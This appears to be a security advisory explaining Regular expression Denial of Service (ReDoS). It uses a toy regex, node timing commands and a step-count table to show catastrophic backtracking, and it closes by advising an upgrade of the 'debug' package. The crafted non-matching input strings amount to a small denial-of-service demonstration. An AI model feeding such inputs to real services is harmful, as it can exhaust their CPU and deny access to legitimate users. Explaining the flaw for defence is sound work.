Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade debug to version 2.6.9, 3.1.0, 3.2.7, 4.3.1 or higher.